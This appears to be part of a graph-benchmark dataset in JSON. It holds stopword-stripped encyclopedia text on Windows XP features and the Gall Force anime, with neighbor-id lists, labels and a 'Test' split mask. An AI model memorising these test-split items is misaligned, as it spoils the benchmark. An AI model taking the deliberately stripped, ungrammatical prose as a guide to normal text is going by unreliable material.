recognizes embedded icc v2 color profiles jpg tiff files gif files shown full animation even zoomed tiff files annotated using annotation toolbar appears bottom screen lines drawn tiff image text added areas image selected concealed windows picture fax viewer also capable viewing multi-page tiff files however tiff images jpeg compression fully supported last button standard toolbar opens image editing default microsoft paint however editing application registered button viewer windows picture fax viewer saves remembers window position size supports keyboard shortcuts operations raw image formats preferred formats professional photography supported however microsoft released later update called raw image thumbnailer viewer windows xp viewing certain raw image files text services framework tsf com framework api introduced windows xp supports advanced text input text processing text services framework designed offer advanced language word processing features applications supports features multilingual support keyboard drivers handwriting recognition speech recognition well spell checking text natural language processing functions also downloadable older windows operating systems language bar core user interface text services framework language bar enables text services add ui elements toolbar enables elements application focus language bar users select input language control keyboard input handwriting recognition speech recognition language bar also provides direct means switch installed languages even non-tsf-enabled application focus windows xp kernel completely different kernel windows 9x/me line operating systems although upgrade windows 2000 kernel major scalability stability performance improvements albeit transparent end user windows xp includes simultaneous multithreading hyperthreading support simultaneous multithreading processor ability process one data thread time windows xp supports larger system virtual address space –— 1.3 gb contiguous virtual address space used device drivers 960 mb windows xp memory manager redesigned consume less paged pool allowing caching greater availability paged pool component needs total size memory-mapped files windows 2000 limited memory manager allocated prototype page table entries pptes pages required map entire file even application created mapped views parts file windows xp prototype ptes allocated active views allowing larger mapped files benefit example case making backups large files low memory systems paged pool limit 470 mb lifted memory manager windows xp unmapped views dynamically reusable memory manager depending pool usage memory pages working sets trimmed efficiently multiprocessor systems depending recently accessed lock contention reduced number unnecessary locks used resource synchronizations ram allocation mapping address windowing extensions system page table entries charging non-paged/paged pool quotas charging commitment pages removed dispatcher lock contention reduced page frame number pfn lock optimized increased parallelism granularity windows xp uses push locks event synchronization object contention support shared exclusive acquisition push locks used protect handle table entries executive object manager protect data structures security descriptors memory manager protect awe-related locks windows xp uses sysenter/sysexit mechanisms require fewer clock cycles transition user mode kernel mode speed system calls kernel page write protection limit windows xp enabled systems 256 mb ram beyond large pages enabled increased address translation performance windows xp introduces creatememoryresourcenotification function notify user mode processes high low memory availability applications allocate memory free memory necessary previous versions windows registry size limited 80 paged pool size windows xp registry reimplemented outside paged pool registry hives memory mapped cache manager system cache eliminating registry size limit registry size limited available disk space system hive still maximum size raised 12 mb 200 mb eliminating issue previous windows versions faced unable boot large fragmented system hive configuration manager updated minimize registry memory footprint lock contention reduce fragmentation thus page faults accessing registry improved algorithms speed registry query processing in-memory security cache eliminates redundant security descriptors windows xp supports cross user session debugging attaching debugger non-crashing user-mode program dumping process memory space using dump command detaching debugger without terminating debugging done firewire port local system debug heap disabled standard heap used debugging windows xp introduces support vectored exception handling vectored exception handling made available windows programmers using languages c++ visual basic veh replace structured exception handling seh rather veh seh coexist veh handlers priority seh handlers compared seh veh works like traditional notification callback scheme applications intercept exception calling addvectoredexceptionhandler api watch handle exceptions vectored handlers chained order linked list n't tied stack frame added anywhere call stack unlike seh try/catch blocks heap leak detection enabled processes exit debugger extension used investigate leaks also introduced new heap performance-monitoring counter windows xp introduces new low fragmentation heap policy disabled default allocates memory distinct sizes blocks less 16kb reduce heap fragmentation low fragmentation heap enabled default heaps using lfh heap enabler utility new apis irp cancellation registering file system filter callbacks intercept os fast i/o functions low memory conditions must succeed calls denied causing slowdown preventing bug check i/o throttled fetch one memory page time increasing overall scalability windows xp includes ntfs 3.1 expands master file table mft entries redundant mft record number useful recovering damaged mft files ntfs conversion utility convert.exe supports new /cvtarea switch ntfs metadata files written contiguous placeholder file resulting less fragmented file system conversion ntfs 3.1 also supports symbolic links although tools drivers shipped windows xp create symbolic links windows xp introduces ability mount ntfs read-only volumes new apis preserve original short file names retrieve list mount points drive letters mounted folder paths specified volume enable applications create large files quickly setting valid data length files without force-writing data zeroes vdl setfilevaliddata function instance function used quickly create fixed size virtual machine hard disk default access control lists newly created files read-only users group write permissions given administrators group system account owner ability boot 30 seconds design goal windows xp microsoft developers made efforts streamline system much possible logical prefetcher significant part monitors files loaded boot optimizes locations files disk less time spent waiting hard drive heads move issues large asynchronous i/o requests overlapped device detection initialization occurs boot prefetcher works tracing frequently accessed paged data used task scheduler create prefetch-instructions file windir \\prefetch system boots application started data code specified trace already memory prefetched disk previous prefetching results determine scenario benefited prefetched next boot launch prefetcher also uses algorithms reduce application startup times reduce disk seeking even disk defragmenter called idle time optimize layout specific files metadata contiguous area boot resume operations traced analyzed using bootvis.exe windows xp includes fast logon optimization feature performs logon asynchronously without waiting network fully initialized roaming user profiles set use cached credentials avoids delays logging domain group policy applied background startup logon scripts execute asynchronously default windows xp reconciles local roaming user profiles using copy contents registry user longer made wait windows 2000 profile unloaded windows xp saves locked registry hives open keys 60 seconds roaming profile changes saved back server problem left computer recover memory profile uses unloaded make sure user profiles completely reconciled correctly logoff microsoft released user profile hive cleanup service windows xp later included windows vista windows xp offers enhancements usability resilience corruption performance roaming user profiles new group policies prevent propagation roaming user profile changes server give administrators control users profile folders preventing use roaming user profiles specific computers accommodate scenario older profile would overwrite newer server profile due windows xp fast logon feature windows xp ensures situation user registry hive copied server local profile deletion profiles marked deletion next logoff fail locked profiles workgroup computers windows xp longer deletes profiles users belonging guests group windows xp includes changes behavior offline files offline files client-side cache encrypted encrypting file system shared folders dfs namespaces made available offline also roaming user profiles synchronized server even offline files marked server unavailable windows xp service pack 2 kb811660 introduce additional functionality offline files editing registry users suppress error messages file types offline files cache excluded synchronization offline files user primary computer determined matching current user sid specified sid registry set purge logoff administratively assigned offline files also prevented cached non-primary users beginning windows xp folders redirected network automatically made available offline using offline files although optionally disabled group policy older windows nt 4.0 earlier systems legacy directory structure windows xp allows redirecting documents folder home directory windows xp improvements made system restore compared windows system restore uses copy-on-write file system filter driver taking snapshots windows xp system restore configurable per volume data stores also stored per volume ntfs volumes restore points stored using ntfs compression protected using acls disk cleanup handler allows deleting recent restore point besides registry hives system files com+ wmi databases iis metabase also restored system restore supports group policy system restore windows xp also works without issues efs-encrypted files automated system recovery feature provides ability save restore windows installed applications system state critical boot system files special backup instead plain reinstall asr consists two components backup restore backup portion located ntbackup backs system state windows registry com+ class registration database active directory sysvol directory share volumes associated operating system components required start windows restore well configuration basic dynamic restore portion asr accessed pressing f2 windows xp text mode setup automated system recovery even restore programs device drivers added asr setup information disk asr restore data files common issue previous versions windows users frequently suffered dll hell one version dynamically linked library dll installed computer software relies dlls using wrong version could result non-functional applications worse windows 98 second edition windows 2000 partially solved problem native code introducing side-by-side component sharing dll/com redirection operating systems allowed loading private version dll placed application folder developer instead system directory must registered properly system windows xp improves upon introducing side-by-side assemblies com+ 2.0 .net com classic win32 components c runtime gdi+ common controls technology keeps multiple digitally signed versions shared dll centralized winsxs folder runs demand appropriate application keeping applications isolated using common dependencies manifests assembly version number used os loader determine correct binding assembly versions applications instead globally registering components achieve windows xp introduces new mode com object registration called registration-free com regfree com allows component object model com components store activation metadata clsid codice_1 component without using registry instead metadata clsids classes implemented component declared assembly manifest described using xml stored either resource executable separate file installed component allows multiple versions component installed different directories described manifests well xcopy deployment application loading windows loader searches manifest present loader adds information activation context com class factory tries instantiate class activation context first checked see implementation clsid found lookup fails registry scanned windows error reporting collects offers send post-error debug information memory dump using internet developer application crashes stops responding user desktop data sent without user consent dump error signature information reaches microsoft server analyzed solution sent back user one available windows error reporting runs windows service optionally entirely disabled software hardware manufacturers may access error reports using microsoft winqual program software hardware manufacturers also close loop customers linking error signatures windows error reporting responses allows distributing solutions well collecting extra information customers reproducing steps took crash providing support links old versions windows users upgrade device driver chance new driver less stable efficient functional original reinstalling old driver major hassle avoid quandary windows xp keeps copy old driver new version installed new driver problems user return previous version feature work printer drivers windows xp merged consumer enterprise versions windows needed support applications developed popular consumer-oriented windows 9x platform windows nt kernel microsoft addressed improving compatibility application-specific tweaks shims providing tools application compatibility toolkit appcompat act allow users apply automate tweaks shims applications users script compatibility layer using batch files windows xp setup also includes compatibility checker warns users setup begins incompatible applications device drivers applications may need reinstallation windows xp rtm includes windows media player version 8 officially called windows media player windows xp windows media 8 codecs windows media player windows xp introduced id3 support mp3s editing media information within library adding lyrics mp3 wma tracks file name customization ripping new visualizations support hdcds ability lockdown player corporate environment dvd playback support appropriate codecs installed separately windows xp sp2 includes windows media player 9 series windows media format runtime 9.0 upgradeable version 11 player format runtime windows media player also incorporates newer hardware support portable devices means media transfer protocol user-mode driver framework-based windows portable devices api original rtm release windows xp included windows movie maker 1.1 added non-compressed dv avi recording digital video sources windows movie maker 2 free download released 2002 later incorporated windows xp sp2 windows movie maker 2 introduced numerous new transitions effects titles credits task pane resizable preview window dimensions improved capture export options automovie feature saving final video back tape custom wmv export profiles windows xp media center edition 2005 includes windows movie maker 2.5 includes dvd burning windows xp includes advances broadcast driver architecture receiving capturing analog digital tv broadcasts complete signal demodulation tuning software de-multiplexing electronic program guide store ip data broadcasting etc addition windows xp media center edition introduced windows media center application pvr-like recording playback features tv content windows xp includes improved firewire ieee 1394 support dvcpro25 525-60 625-50 digital video cameras audio video devices introduces mstape wdm driver d-vhs mpeg camcorder devices windows xp sp2 adds support dvcpro50 dvcpro100 directshow 8 introduces video mixing renderer-7 vmr-7 filter uses directdraw 7 video rendering replacing overlay mixer vmr-7 mix multiple streams graphics alpha blending allowing applications draw text closed captions graphics channel logos ui buttons video without flickering support compositing implement custom effects transitions vmr-7 also supports source color keying overlay surface management frame-stepping improved multiple-monitor support vmr-7 features windowless mode applications easily host video playback within window renderless playback mode applications access composited image rendered directx 9 introduced vmr-9 uses direct3d 9 instead directdraw allowing developers transform video images using direct3d pixel shaders windows xp sp2 introduced yuv mixing mode vmr-7 vmr-9 renderers performs mixing yuv color space save memory bandwidth directshow 8 includes avstream multimedia class driver video-only audio-video kernel streaming windows xp provides new and/or improved drivers user interfaces devices compared windows 98 beginning windows xp service pack 1 generic usb 2.0 enhanced host controller interface drivers included windows xp also adds support usb device classes bluetooth usb video device class imaging still image capture device class media transfer protocol windows media player 10 mass storage devices windows xp introduces hardware descriptors distinguish various storage types operating system set appropriate default write caching policy example usb devices disables write caching default surprise removal devices cause data loss device manager provides configuration setting whether optimize devices quick removal performance windows xp supports twain well windows image acquisition-based scanners windows image acquisition windows xp adds support automatic document feeder scanners scroll-fed scanners without preview capabilities multi-page tiff generation wia video snapshot filter driver introduced allows still frames captured video stream windows xp sp1 later support downloadable wia library v2.0 provides access wia functionality programming languages scripting environments support ole automation scanner camera wizard based windows image acquisition common dialogs wia devices improved windows xp show media information metadata rotate images necessary categorize subfolders capture images video case still video camera crop scan images single multi-page tiff case scanner picture transfer protocol ptp implementation updated support mandatory optional commands ptp standard object tree support allows secondary files associated parent file grouped transferred concurrently windows media player 10 also adds media transfer protocol transferring media content portable devices thus digital cameras windows xp supports acquiring photos using either wia ptp usb mass storage class mtp protocols depending camera manufacturer supports windows xp includes technology roxio allows users directly burn files compact disc windows explorer previously end users install cd burning software windows xp cd dvd-ram fat32 dvd-ram burning directly integrated windows interface data discs created using joliet iso 9660 file systems audio cds using redbook standard prevent buffer underrun errors windows xp premasters complete image files burnt streams disc burner users burn files cd way write files floppy disk hard drive via standard copy-paste drag drop methods burning functionality also exposed api called image mastering api windows xp cd burning support disk-to-disk copying disk images although api used programmatically tasks creation audio cds integrated windows media player audio cds burnt using track-at-once mode cd-rw discs quick erased api support added windows xp burning dvds blu-ray discs mastered-style burning udf write-once rewritable dvd blu-ray media installing windows feature pack storage upgrades imapi version 2 note add dvd blu-ray burning features windows explorer third party applications use apis support dvd blu-ray burning windows xp includes firewire 800 support 1394b beginning service pack 1 mentioned section windows xp includes improved support firewire cameras audio video devices s/pdif audio mpeg-2 video streams supported across firewire audio video receivers set-top boxes dvd d-vhs speakers tv transmissions windows xp supports av/c iec 61883 protocol isochronous real-time data transfer audio-video applications windows xp also allows non-firewire devices exposed virtual firewire devices direct memory access 1394 bus host target allows kernel debugging firewire finally support tcp/ip networking internet connection sharing ieee 1394 bus windows xp includes windows script host 5.6 major update wsh environment includes improved object model reduce boilerplate code stronger security several improvements new xml-based file format windows script file format .wsf introduced besides .vbs .js store xml node file extra information besides script code digital signature blocks runtime directives instructions import external code wsf schema include jobs wrapped unique job tag outer package tag tags wsf file allow including external files importing constants tlb storing usage syntax runtime element displaying using new showusage method invoked switch wsf format also supports hosting multiple wsh scripting languages including cross function-calls wshshell object supports 'currentdirectory read-write method scripts digitally signed well verified programmatically using scripting.signer object script provided valid certificate present system alternatively signcode tool platform sdk extended support wsh filetypes may used command line verifyfile method used authenticate embedded signature validity check script modifications signing wsh thus decide whether execute script verification code stored in-memory string also signed using sign method signature block stored commented section script file backward compatibility older wsh versions using software restriction policies supported windows xp later system may also configured execute scripts digitally signed thus preventing execution untrusted scripts local scripts also run remote machine new wscript.wshcontroller object powered dcom remote wsh enabled group policy administrative template registry remote scripts always run wscript loaded remote machine server process run non-interactively default configured using dcomcnfg run security context allows display user interface wsh automation server loads instance wshremote object created script runs calling execute method external files called remote script must located remote machine directory path specified exec method remote script monitored using status property wsh 5.6 introduces exec method wshshell object execute command-line console applications access standard i/o streams stdin stdout stderr spawned process earlier versions windows script use arguments one access wsharguments collection object could created externally required person running script know order arguments syntax values wsh 5.6 introduces named arguments command line follow /string value boolean convention defined 'runtime tag recognized irrespective order command line named arguments grouped named collection object usual methods like item count length well exists method 'showusage method wsharguments object mentioned earlier shows argument information message box windows xp includes scriptpw.password com automation object implemented scriptpw.dll file used mask sensitive information like passwords command line scripts users log windows xp professional remotely remote desktop service built terminal services technology rdp similar remote assistance allows remote users access local resources printers terminal services client special remote desktop connection client web-based client using activex control may used connect remote desktop remote desktop clients earlier versions windows windows 95 windows 98 98 second edition windows windows nt 4.0 windows 2000 made available microsoft permits earlier versions windows connect windows xp system running remote desktop vice versa several resources users redirect remote server machine local client depending upon capabilities client software used instance file system redirection allows users use local files remote desktop within terminal session printer redirection allows users use local printer within terminal session would locally network shared printer port redirection allows applications running within terminal session access local serial parallel ports directly audio allows users run audio program remote desktop sound redirected local computer clipboard also shared remote computer local computer rdp client windows xp upgraded 7.0 remote desktop web connection component internet information services 5.1 also allows remote desktop functionality web activex control internet explorer remote assistance allows windows xp user temporarily take remote windows xp computer network internet resolve issues hassle system administrators personally visit affected computer remote assistance allows diagnose possibly even repair problems computer without ever personally visiting remote assistance allows sending invitations support person email windows messenger saving invitation file computer controlled support person connecting remotely well one sending invitation chat audio-video conversations file transfer available windows xp introduces fast user switching end user friendly welcome screen user account picture replaces classic logon prompt fast user switching allows another user log use system without log previous user quit applications previously windows windows 2000 one user time could logged except terminal services serious drawback multi-user activity fast user switching like terminal services requires system resources single user logged time although one user logged one user actively using account time feature available welcome screen turned joined windows server domain novell client installed even welcome screen enabled users switch classic logon pressing ctrl+alt+del twice welcome screen windows xp introduced windows installer msi 2.0 windows installer 2.0 brought major improvements installation management side-by-side clr assemblies sandboxing msi custom actions improved event logging hiding sensitive information log files per-user program isolation digital signatures improved patching robust patch conflict resolution reduced unnecessary unversioned file copying source prompts terminal server support integration system restore software restriction policies windows xp service pack 2 includes windows installer 3.0 also adds numerous improvements patching patch uninstallation support add remove programs binary delta patches patch sequencing install patches correct order installing multiple patches different products one transaction eliminating source media requests delta compression patches patch elevation limited user accounts msi source location list inventory management apis fixing numerous bugs windows xp sp3 includes msi 3.1v2 windows xp updated windows installer 4.5 windows disk defragmenter updated alleviate several restrictions longer relies windows nt cache manager prevented defragmenter moving pieces file cross 256kb boundary within file parts stream including cluster boundary non-compressed files reparse points bitmaps attribute_lists ntfs metadata files efs-encrypted files ntfs master file table defragmented defragmenter supports ntfs volumes cluster sizes larger 4 kilobytes command-line tool defrag.exe included providing access defragmenter cmd.exe task scheduler users members power users group schedule defragmentation windows task manager incorporates number improvements windows xp updated display process names longer 15 characters length processes tab used truncated windows 2000 session id user name columns added processes tab delete key also used terminate processes processes tab new networking tab shows statistics relating network adapters present computer default adapter name percentage network utilization link speed state network adapter shown along chart recent activity options shown choosing select columns ... view menu users tab shows users currently session computer server computers may several users connected computer using terminal services may also multiple users logged onto computer one time using fast user switching users disconnected logged tab shutdown menu introduced allows access standby hibernate turn restart log switch user holding codice_2 clicking new task opens command prompt windows xp includes new command-line tools wmi-based scripts windows 2000 ntlm hash user password requirement technically allowed potential malefactor decrypt master key ntlm hash directly security accounts manager database windows xp improves dpapi security encrypting master key using sha1 hash password also improves security data encrypted encrypting file system windows xp pki supports cross-certification bridge ca scenarios user -type certificates auto-enrolled renewed certificate requests issuing new certificates renewing expired ones pending administrator approval issued certificate authority approved install automatically root ca certificates also auto-update via microsoft update windows xp also supports delta crls crls whose status changed since last full base compiled crl base64-encoded crls revocation checking use default windows xp enroll version 2 certificate templates many configurable attributes smart cards used log terminal server sessions connecting windows server 2003 higher terminal server capicom system tools net.exe runas.exe also numerous improvements certificate status checking chain building revocation checking path validation discovery windows xp service pack 3 adds sha-2 hashing algorithms sha256 sha384 sha512 cryptoapi validating x.509 certificates windows xp includes several encrypting file system improvements notable improvement multiple user accounts share access encrypted files file-by-file basis details button advanced file attributes dialog file properties allows adding removing additional users access efs-encrypted file viewing certificate thumbprint data recovery agent account efs certificates autoenrolled ca support revocation checking certificates used sharing encrypted files unlike windows 2000 default local data recovery agent requirement one although self-signed certificate recovery agent generated using cipher.exe dpapi master key protected using domain-wide public key stronger fips 140-1 compliant algorithm 3des used windows xp service pack 1 adds support default use aes-256 symmetric encryption algorithm efs-encrypted files kb912761 windows xp sp2 windows xp sp3 users configure whether efs generates self-signed certificate certificate authority unavailable windows xp also warns user efs encrypted files copied file system fat unsupported location support efs thus file going get decrypted windows xp also encrypt files remote server ntfs server trusted delegation active directory user certificate private key loaded local profile server roaming user profile used copied locally webdav server mapped drive letter windows xp encrypt file locally transport raw encrypted file webdav server using http put command similarly efs encrypted files downloaded raw webdav decrypted locally command line utilities cipher copy xcopy updated windows xp efs also completely disabled windows xp group policy domain registry non-domain computer faster cache validation time long user session key certificate chain cached adjusted starting windows xp password reset disk created using forgotten password wizard disk used reset password using password reset wizard logon screen user rsa private key backed using offline public key whose matching private key stored one two places password reset disk computer member domain active directory member domain attacker authenticate windows xp localsystem still access decryption key stored pc hard drive password reset dpapi master key deleted windows xp blocks access efs encrypted files prevent offline rogue attacks protect encrypted files user changes password back original password efs encrypted files recovered windows xp prompts credentials upon authentication errors allows saving use integrated windows authentication secure roaming keyring store protected data protection api saved credentials managed stored user names passwords item user accounts control panel certificate authority present users select x.509 certificate prompted credentials resource accessed saved credentials used remote access/vpn connections also create temporary credentials keyring make experience seamless credential manager also exposes api single sign windows xp introduces software restriction policies safer api use software restriction policies system may configured execute install applications scripts digitally signed certain trust level thus preventing execution untrusted programs scripts administrators define default rule using local security policy snap-in exceptions rule types rules include hash rule path rule certificate rule zone rule identify file hash path software publisher certificate internet explorer-zone respectively example activex control restricted run particular domain specifying certificate rule-based software restriction policy windows xp service pack 2 introduced data execution prevention feature present nx evp amd amd64 processors xd edb intel processors flag certain parts memory containing data instead executable code prevents overflow errors resulting arbitrary code execution intended prevent application service executing code non-executable memory region helps prevent certain exploits store code via buffer overflow example dep runs two modes hardware-enforced dep cpus mark memory pages nonexecutable software-enforced dep limited prevention cpus hardware support software-enforced dep protect execution code data pages instead another type attack seh overwrite hardware-enforced dep enables nx bit compatible cpus automatic use pae kernel 32-bit windows native support 64-bit kernels software dep unrelated nx bit microsoft calls enforcement safe structured exception handling software dep/safeseh simply checks exception thrown make sure exception registered function table application requires program built dep enabled applications users gain additional resistance zero-day exploits applications dep-compliant generate dep exceptions therefore dep enforced applications default 32-bit versions windows turned critical system components however windows xp service pack 3 introduces additional nx apis allow software developers enable nx hardware protection code independent system-wide compatibility enforcement settings developers mark applications nx-compliant built allows protection enforced application installed runs enables higher percentage nx-protected code software ecosystem 32-bit platforms default system compatibility policy nx configured protect operating system components windows xp rtm introduced internet connection firewall later upgraded windows firewall windows xp service pack 2 support filtering ipv6 traffic well default windows firewall performs stateful packet filtering inbound solicited unsolicited traffic types network interfaces lan/wlan pppoe vpn dial-up connections like internet connection sharing firewall location-aware policy meaning disabled corporate domain enabled private home network option disallow exceptions may useful connecting public network firewall also used edge firewall ics clients firewall blocks program displays notification excepted traffic specified tcp/udp port application filename scope part network excepted traffic originates supports port mapping icmp security log capabilities included record ip addresses data relating connections originating home office network internet record dropped packets successful connections used instance track every time computer network connects website windows firewall also supports configuration group policy applications use windows firewall apis automatically add exceptions windows security center introduced windows xp service pack 2 provides users ability view status computer security settings services windows security center also continually monitors security settings informs user via pop-up notification balloon problem windows security center consists three major components control panel windows service application programming interface provided windows management instrumentation control panel divides monitored security settings categories headings displayed color-coded backgrounds current state settings determined windows service starts automatically computer starts takes responsibility continually monitoring system changes settings made available system wmi provider anti-malware firewall software vendors register security center wmi provider windows update settings status also monitored reported windows 2000 wireless support support seamless roaming auto-configuration windows xp wireless zero configuration service supports automatic wireless network configuration re-authentication necessary thus providing seamless roaming capability setting preferred order connections absence wireless access point windows xp set ad hoc wireless network native support wpa wpa2 authentication infrastructure networks latest service packs and/or updates applied windows xp includes wireless network setup wizard supports windows connect usb flash drive wcn-ufd method ease setting wireless network inexperienced users kb918997 windows xp sp2 windows xp sp3 add wireless lan api developers create wireless client programs manage profiles connections ieee 802.1x support wireless wired connections case pki available issue certificates vpn connection support preshared key ike authentication windows xp connect hotspots created using wireless provisioning services windows xp service pack 2 added native bluetooth support windows xp bluetooth stack supports external integrated bluetooth dongles attached usb windows xp sp2 sp3 support bluetooth 1.1 1.0 bluetooth 2.0 bluetooth 2.0+edr bluetooth stack supports following bluetooth profiles natively pan spp dun hid hcrp third-party stacks may replace windows xp stack may support profiles newer versions bluetooth windows xp internet connection sharing integrated upnp allowing remote discovery control ics host quality service packet scheduler component ics client relatively fast network ics host connected internet slow link windows may incorrectly calculate optimal tcp receive window size based speed link client ics host potentially affecting traffic sender adversely ics qos component sets tcp receive window size would receiver directly connected slow link internet connection sharing also includes local dns resolver windows xp provide name resolution network clients home network including non-windows-based network devices ics also location-aware connected domain computer group policy restrict use ics home ics enabled multiple applications accessing internet simultaneously without qos connection n't fast enough tcp receive window size set full window data transit first application uses connection steady state reached subsequent connections made applications take much longer reach optimal window size transmission rate second third application always lower application established connection first slow links qos component windows xp automatically enables deficit round robin scheduling scheme creates separate queue application services queues round-robin fashion basic production quality support windows xp ipv6 teredo tunneling advanced networking pack later incorporated windows xp sp2 ipv6 installed configured command line using netsh interface ipv6 context gui support network interface link-local address assigned stateless autoconfiguration local global addresses performed windows xp static ipv6 addresses assigned ipv6 router local link transition mechanisms manually configured tunnels 6to4 set windows firewall beginning windows xp sp2 also supports ipv6 stateful filtering applications tools telnet client ftp client ping nslookup tracert dns resolver file print sharing internet explorer iis updated support ipv6 privacy extensions enabled used default 6to4 automatically activated public ipv4 addresses without global ipv6 address types tunnels set include 6over4 teredo isatap portproxy teredo also helps traverse cone restricted nats teredo host-specific relay enabled global ipv6 address assigned otherwise teredo client functionality enabled windows xp dns resolver make dns queries using ipv4 use ipv6 transport make query however dns query sends back ipv4 ipv6 resource records ipv6 addresses preferred windows xp support dhcpv6 pppv6/ipv6cp open source dhcpv6 implementation called dibbler available although stateless autoconfiguration largely makes unnecessary windows xp includes background intelligent transfer service windows service facilitates prioritized throttled asynchronous transfer files machines using idle network bandwidth bits transfer data whenever bandwidth used applications example applications use 80 available bandwidth bits use remaining 20 bits constantly monitors network traffic increase decrease network traffic throttles transfers ensure foreground applications web browser get bandwidth need bits also supports resuming transfers case disruptions bits version 1.0 supports downloads version 1.5 bits supports downloads uploads uploads require iis web server bits server extension receiving side bits 2.0 part windows xp sp2 added support performing concurrent foreground downloads using server message block paths remote names downloading portions file changing prefix complete name remote name limiting client bandwidth usage bits upgradeable version 2.5 windows xp bits 2.5 part windows xp sp3 adds support ipv6 certificate-based client authentication secure http transports custom http headers windows xp components windows update use bits download updates idle bandwidth used download updates downloading resumed case network connectivity interrupted bits uses queue manage file transfers downloads files behalf requesting applications asynchronously i.e. application requests bits service transfer free job even terminate transfer continue background long network connection job owner logged bits supports transfers http https network application begins consume bandwidth bits decreases transfer rate preserve user interactive experience except foreground priority downloads bits exposed component object model com making possible use virtually programming language windows xp fax console manage incoming outgoing archived faxes settings fax monitor appears notification area fax transmission reception progress manual reception faxes enabled appears upon incoming fax call archived faxes open windows picture fax viewer tiff format upon installing microsoft outlook fax service automatically switches windows address book using outlook address book windows xp introduces fax service extended com api application developers incorporate fax functionality advanced networking pack later made part sp2 introduced peer-to-peer networking peer name resolution protocol pnrp windows xp operates ipv6 p2p architecture windows xp consists following components pnrp provides dynamic name publication resolution names endpoints pnrp distributed name resolution protocol allowing internet hosts publish peer names corresponding ipv6 addresses optionally information hosts resolve peer name retrieve corresponding addresses information establish peer-to-peer connections pnrp peer names composed authority qualifier authority identified secure hash associated public key place-holder number zero peer name unsecured qualifier string allowing authority different peer names different services peer name secure pnrp name records signed publishing authority verified using public key unsecured peer names published anybody without possible verification multiple entities publish peer name example peer name associated group group member publish addresses peer name peer names published resolved within specified scope scope local link site e.g campus whole internet graphing pnrp also allows creating overlay network called graph peer overlay network corresponds node graph nodes resolved addresses using pnrp nodes graph share book-keeping information responsible functioning network whole example distributed resource management network node resource needs shared information shared records flooded peers graph peer stores record local database record consists header body body contains data specific application using api header contains metadata describe data body name-value pairs serialized using xml addition author version information also contain index body data fast searching node connect nodes directly well communication need shared entire graph grouping peer-to-peer api also allows creation secure overlay network called group consisting subset nodes graph group shared multiple applications unlike graph peers group must identifiable unique named registered using pnrp digital signature certificate termed group member certificate gmc records exchanged digitally signed peers must invited group invitation contains gmc enables join group windows xp introduces simplified form sharing files local users multi-user environment network called simple file sharing simple file sharing enabled default non-domain joined computers disables separate security tab used set advanced acls/permissions enables common interface permissions file system folders sharing simple file sharing enabled documents folder subfolders read written owner local administrators shared network checking make folder private option properties local administrators also denied permissions documents folder sharing files user accounts computer simple file sharing enabled windows xp includes shared documents folder simple file sharing disables granular local network sharing permissions shares item everyone group network read write access without asking password forcing guest user permissions windows xp webdav mini-redirector added preferred old web folders client default newer client works system service network-redirector level immediately file-system allowing webdav shares assigned drive letter used software even firewalls nats applications open remote files http servers edit file save changes back file server allows redirector also allows webdav shares addressed via unc paths e.g codice_5 converted codice_6 compatibility windows filesystem apis webdav mini-redirector known limitations authentication support although windows xp ship following major windows features out-of-the-box new features added windows xp downloading components incorporated later versions windows",
    "neighbors": [
      5120,
      513,
      517,
      6150,
      5643,
      4624,
      9744,
      1043,
      11283,
      537,
      540,
      3102,
      7713,
      9762,
      8227,
      8740,
      11301,
      1575,
      1577,
      6697,
      10281,
      1581,
      4143,
      7728,
      3122,
      7218,
      9780,
      2101,
      8246,
      10812,
      3648,
      4162,
      582,
      8262,
      1098,
      7754,
      10828,
      4173,
      4174,
      10831,
      9808,
      10839,
      601,
      8281,
      603,
      9819,
      8798,
      6751,
      7776,
      3170,
      10338,
      7780,
      8296,
      5225,
      10344,
      8299,
      622,
      9839,
      4210,
      7796,
      4213,
      1656,
      6265,
      7290,
      4731,
      636,
      5243,
      8315,
      639,
      10366,
      641,
      10879,
      8841,
      651,
      1164,
      653,
      3723,
      6797,
      10896,
      2193,
      9874,
      2196,
      10900,
      4248,
      10908,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      10414,
      3250,
      5300,
      9910,
      2749,
      4797,
      200,
      9420,
      1741,
      10957,
      3283,
      214,
      3289,
      4316,
      1757,
      2782,
      2783,
      4321,
      9442,
      4836,
      4326,
      2279,
      9448,
      3308,
      10989,
      238,
      1776,
      8432,
      10993,
      7411,
      2804,
      10486,
      6904,
      3834,
      1791,
      8959,
      11519,
      2312,
      3856,
      8976,
      2322,
      3351,
      8473,
      5402,
      8985,
      8988,
      11546,
      9505,
      5413,
      10024,
      3881,
      6441,
      10026,
      10029,
      3890,
      1844,
      9525,
      11572,
      10039,
      6972,
      10557,
      4926,
      6462,
      321,
      3394,
      5454,
      3922,
      11605,
      2391,
      4439,
      5465,
      5470,
      10079,
      11103,
      2402,
      2919,
      11112,
      4458,
      6506,
      8561,
      9593,
      2943,
      7039,
      8576,
      3463,
      9609,
      1418,
      5003,
      5004,
      2959,
      8080,
      9620,
      4505,
      9114,
      11677,
      10144,
      929,
      4515,
      11683,
      3496,
      430,
      6062,
      9655,
      6584,
      1978,
      2493,
      7615,
      960,
      1474,
      7106,
      8132,
      6087,
      6088,
      969,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      479,
      5600,
      8161,
      6114,
      6115,
      8674,
      9694,
      4074,
      9196,
      6637,
      4590,
      5103,
      9709,
      6641,
      3571,
      11251,
      3573,
      10229,
      10747,
      2558,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 8081,
    "label": 3,
    "text": "Gall_Force:gall force origin precursor gall force franchise originally appearing monthly model graphix magazine japan 3d photo novel using detailed models later set stage animated films rabby patty rumy main solnoid characters featured equipped different uniforms weapons vehicles shown regular gall force ovas although first-ever storyline gall force mythos proper star front place official continuity questioned disregarded due contradictions eternal story although actual origin franchise seen fans non-canon alternate timeline another factor causes question fact fans outside japan never knew photo novel existence original timeline gall force series consist four story arcs first story arc rhea arc earth chapter arc new era arc within arc several episodes exception rhea first arc starts centuries-long war paranoids solnoids exodus early humanity planet terra death star leaf crew timeline ends events lead rhea arc first story arc consists three episodes gall force eternal story gall force 2 destruction gall force 3 stardust war rhea gall force takes place aftermath stardust war events earth chapter 21st century earthen discovery derelict alien technology moon—which fact remnants events eternal story —ignited arms race western eastern blocs rushed deploy technology weapons including form artificial life based paranoids mme artificial life turned humanity starting war extermination creators rhea plot summary year 2084 scientist grey newman found reverse-engineered technology solnoid ship found moon see eternal story unintentionally brought end civilization world war iii breaks middle battle human alien synthezoids turn creators nearly annihilating humankind later year 2085 remaining humans run machines terminating order survive defeat alien machines human 